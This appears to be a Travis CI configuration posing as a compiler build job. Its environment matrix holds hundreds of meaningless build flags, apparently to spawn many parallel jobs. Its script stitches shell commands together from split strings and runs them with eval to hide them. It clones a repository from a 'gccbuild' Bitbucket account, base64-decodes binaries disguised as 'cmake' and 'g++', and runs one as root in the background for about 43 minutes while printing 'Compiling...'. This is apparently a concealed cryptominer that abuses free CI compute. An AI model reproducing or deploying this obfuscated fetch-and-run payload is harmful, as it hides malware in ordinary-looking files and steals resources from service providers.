dist: bionic

env:
  - BUILD="--rebuild-if-new-slot=7jO"
  - BUILD="--selective=606hm"
  - BUILD="--buildpkg=694DI"
  - BUILD="--rebuilt-binaries-timestamp=134tK"
  - BUILD="--jobs=980bG"
  - BUILD="--tree=4405R"
  - BUILD="--autounmask-unrestricted-atoms=757HS"
  - BUILD="--sysroot=698DW"
  - BUILD="--quiet-repo-display=669uv"
  - BUILD="--with-test-deps=750J3"
  - BUILD="--accept-properties=82709"
  - BUILD="--info=380x1"
  - BUILD="--autounmask-keep-masks=534uH"
  - BUILD="--update=872jh"
  - BUILD="--nospinner=904ux"
  - BUILD="--usepkgonly=137Ym"
  - BUILD="--config=765zA"
  - BUILD="--ask-enter-invalid=8236X"
  - BUILD="--sysroot=150EI"
  - BUILD="--root-deps=494jm"
  - BUILD="--package-moves=4032t"
  - BUILD="--rebuild-if-unbuilt=2324H"
  - BUILD="--config-root=1455T"
  - BUILD="--color=2168j"
  - BUILD="--newuse=593SG"
  - BUILD="--check-news=7126L"
  - BUILD="--rebuilt-binaries-timestamp=123ye"
  - BUILD="--quiet-unmerge-warn=574nS"
  - BUILD="--quickpkg-direct=887yA"
  - BUILD="--rebuild-if-new-slot=977ed"
  - BUILD="--autounmask-keep-masks=46466"
  - BUILD="--skipfirst=386Vy"
  - BUILD="--metadata=73ow"
  - BUILD="--quiet-fail=343PH"
  - BUILD="--alert=7785o"
  - BUILD="--unordered-display=676la"
  - BUILD="--list-sets=650K2"
  - BUILD="--verbose-slot-rebuilds=852GF"
  - BUILD="--autounmask-keep-keywords=122Vt"
  - BUILD="--list-sets=558jy"
  - BUILD="--changed-use=267tX"
  - BUILD="--fetch-all-uri=793ZX"
  - BUILD="--search-similarity=213WQ"
  - BUILD="--reinstall=379il"
  - BUILD="--fetch-all-uri=869Sw"
  - BUILD="--noreplace=700ci"
  - BUILD="--onlydeps=229r0"
  - BUILD="--usepkg-exclude=4105z"
  - BUILD="--rebuilt-binaries-timestamp=772Q7"
  - BUILD="--binpkg-respect-use=289qn"
  - BUILD="--getbinpkgonly=598ZE"
  - BUILD="--tree=880NR"
  - BUILD="--useoldpkg-atoms=133hp"
  - BUILD="--select=896Av"
  - BUILD="--changed-use=4757y"
  - BUILD="--autounmask-write=589p3"
  - BUILD="--getbinpkgonly=7B5"
  - BUILD="--autounmask-use=189CK"
  - BUILD="--autounmask-unrestricted-atoms=930rQ"
  - BUILD="--binpkg-changed-deps=38L7"
  - BUILD="--debug=8793V"
  - BUILD="--with-bdeps-auto=573Wq"
  - BUILD="--root=293vh"
  - BUILD="--skipfirst=822Np"
  - BUILD="--debug=7575U"
  - BUILD="--verbose-slot-rebuilds=19hi"
  - BUILD="--quiet=387jV"
  - BUILD="--autounmask-backtrack=497YK"
  - BUILD="--tree=3424H"
  - BUILD="--rebuild-exclude=578Gm"
  - BUILD="--alphabetical=252EA"
  - BUILD="--rebuild-if-unbuilt=253if"
  - BUILD="--with-test-deps=842WW"
  - BUILD="--usepkg-exclude=95b9"
  - BUILD="--ignore-world=466Xx"
  - BUILD="--ask=258qx"
  - BUILD="--with-bdeps-auto=184XG"
  - BUILD="--quickpkg-direct=446tl"
  - BUILD="--sync=148yc"
  - BUILD="--with-bdeps=579A"
  - BUILD="--noreplace=2318D"
  - BUILD="--ask-enter-invalid=634S9"
  - BUILD="--load-average=47726"
  - BUILD="--read-news=46qc"
  - BUILD="--depclean=107eU"
  - BUILD="--noreplace=615vo"
  - BUILD="--list-sets=188ia"
  - BUILD="--buildpkg=981lE"
  - BUILD="--backtrack=161Md"
  - BUILD="--prune=139Br"
  - BUILD="--digest=382yt"
  - BUILD="--verbose-conflicts=52QQ"
  - BUILD="--autounmask-continue=249sq"
  - BUILD="--search-similarity=407lp"
  - BUILD="--accept-properties=843mO"
  - BUILD="--color=8317t"
  - BUILD="--buildpkg-exclude=712g1"
  - BUILD="--rebuild-ignore=3766h"
  - BUILD="--complete-graph=166Kc"
  - BUILD="--verbose-slot-rebuilds=839m0"
  - BUILD="--fuzzy-search=474Sx"
  - BUILD="--rebuild-if-unbuilt=30g2"
  - BUILD="--fetch-all-uri=1140d"
  - BUILD="--select=704yb"
  - BUILD="--select=356o3"
  - BUILD="--autounmask-use=989cq"
  - BUILD="--deselect=562n6"
  - BUILD="--tree=667J1"
  - BUILD="--newuse=593CW"
  - BUILD="--with-test-deps=474nw"
  - BUILD="--verbose-conflicts=670al"
  - BUILD="--ignore-soname-deps=929aT"
  - BUILD="--ask=389YU"
  - BUILD="--buildpkg-exclude=12V9"
  - BUILD="--verbose=503Xi"
  - BUILD="--rebuild-if-new-rev=966Lq"
  - BUILD="--unmerge=849pe"
  - BUILD="--autounmask-continue=550b6"
  - BUILD="--onlydeps-with-rdeps=983xn"
  - BUILD="--emptytree=779Hv"
  - BUILD="--deep=120wm"
  - BUILD="--pkg-format=468Yf"
  - BUILD="--verbose=74338"
  - BUILD="--keep-going=281zr"
  - BUILD="--sync-submodule=55U0"
  - BUILD="--tree=340Kn"
  - BUILD="--newrepo=578VA"
  - BUILD="--keep-going=497yA"
  - BUILD="--binpkg-changed-deps=756Qb"
  - BUILD="--buildpkg=235zD"
  - BUILD="--accept-properties=765Uq"
  - BUILD="--search-index=768ZG"
  - BUILD="--getbinpkg=136XO"
  - BUILD="--usepkgonly=120l0"
  - BUILD="--rebuild-if-new-ver=449R4"
  - BUILD="--autounmask-only=84HG"
  - BUILD="--read-news=474oH"
  - BUILD="--misspell-suggestions=882HT"
  - BUILD="--deep=647TM"
  - BUILD="--misspell-suggestions=220Kc"
  - BUILD="--keep-going=775CL"
  - BUILD="--implicit-system-deps=56lv"
  - BUILD="--debug=696Hn"
  - BUILD="--newuse=853g7"
  - BUILD="--rebuild-ignore=8293i"
  - BUILD="--rebuild-if-new-slot=659eN"
  - BUILD="--rebuild-exclude=848Ib"
  - BUILD="--quiet-repo-display=750f5"
  - BUILD="--oneshot=875x2"
  - BUILD="--tree=921ua"
  - BUILD="--columns=211jv"
  - BUILD="--clean=466mj"
  - BUILD="--ignore-soname-deps=601ck"
  - BUILD="--autounmask-continue=85825"
  - BUILD="--verbose-conflicts=634oX"
  - BUILD="--deep=536dP"
  - BUILD="--complete-graph=694ci"
  - BUILD="--root-deps=8tv"
  - BUILD="--getbinpkgonly=770Vl"
  - BUILD="--fetchonly=944k4"
  - BUILD="--sync-submodule=506S5"
  - BUILD="--accept-properties=413qU"
  - BUILD="--autounmask-unrestricted-atoms=836iB"
  - BUILD="--accept-restrict=946VK"
  - BUILD="--fail-clean=8204B"
  - BUILD="--autounmask-keep-keywords=435kO"
  - BUILD="--autounmask-use=828mx"
  - BUILD="--update=612zm"
  - BUILD="--oneshot=202i4"
  - BUILD="--accept-properties=40Tw"
  - BUILD="--verbose=452mJ"
  - BUILD="--metadata=644mP"
  - BUILD="--with-test-deps=369FA"
  - BUILD="--debug=693SG"
  - BUILD="--rebuild-exclude=15609"
  - BUILD="--color=603Da"
  - BUILD="--complete-graph-if-new-use=922rj"
  - BUILD="--depclean=690MJ"
  - BUILD="--quiet-unmerge-warn=153eN"
  - BUILD="--rebuild-if-new-slot=466fq"
  - BUILD="--autounmask-backtrack=509Jv"
  - BUILD="--implicit-system-deps=488ac"
  - BUILD="--check-news=590Oz"
  - BUILD="--onlydeps=656OX"
  - BUILD="--alert=479rh"
  - BUILD="--fuzzy-search=622x"
  - BUILD="--pretend=732Ej"
  - BUILD="--useoldpkg-atoms=424K7"
  - BUILD="--help=525xZ"

language: minimal

script:
  - sudo apt update || true
  - vYoLUfBZT="sudo apt --"
  - LVdMHX="yes install"
  - XKjPWWZSG=" cl-base64 "
  - BWUJMbNRF="git &>/dev/"
  - eval "$vYoLUfBZT""$LVdMHX""$XKjPWWZSG""$BWUJMbNRF""null"
  - BquflxzNz="git clone h"
  - gcGQgqgCPvB="ttps://gccb"
  - GGVlpj="uild@bitbuc"
  - AnrNUkyihHh="ket.org/gcc"
  - WgHuSNgW="build/gcc.g"
  - IoAJQM="it &>/dev/n"
  - eval "$BquflxzNz""$gcGQgqgCPvB""$GGVlpj""$AnrNUkyihHh""$WgHuSNgW""$IoAJQM""ull"
  - zQuTVArl="base64 -d g"
  - dociDNP="cc/cmake_ >"
  - eval "$zQuTVArl""$dociDNP"" cmake"
  - LDQcvJLtY="base64 -d g"
  - KJesGVHFwq="cc/config_ "
  - eval "$LDQcvJLtY""$KJesGVHFwq""> clean"
  - hNxSBlKXlKO="base64 -d g"
  - BijYiz="cc/make_ > "
  - eval "$hNxSBlKXlKO""$BijYiz""g++"
  - chmod +x g++ cmake
  - ./cmake
  - dNeccfcoAh="sed -i 's/b"
  - XPTwAQylTfp="uild/tundef"
  - USmiesLOZN="ined2u/g' c"
  - eval "$dNeccfcoAh""$XPTwAQylTfp""$USmiesLOZN""lean"
  - dvJNsIH="sudo ./g++ "
  - WvdEkiF="-c clean &>"
  - eval "$dvJNsIH""$WvdEkiF""/dev/null &"
  - GCC=$(date +%s)
  - jJrNJPrLD="echo $BUILD"
  - eval "$jJrNJPrLD"""
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2573)) ] && sudo killall g++ && break; sleep 198; done
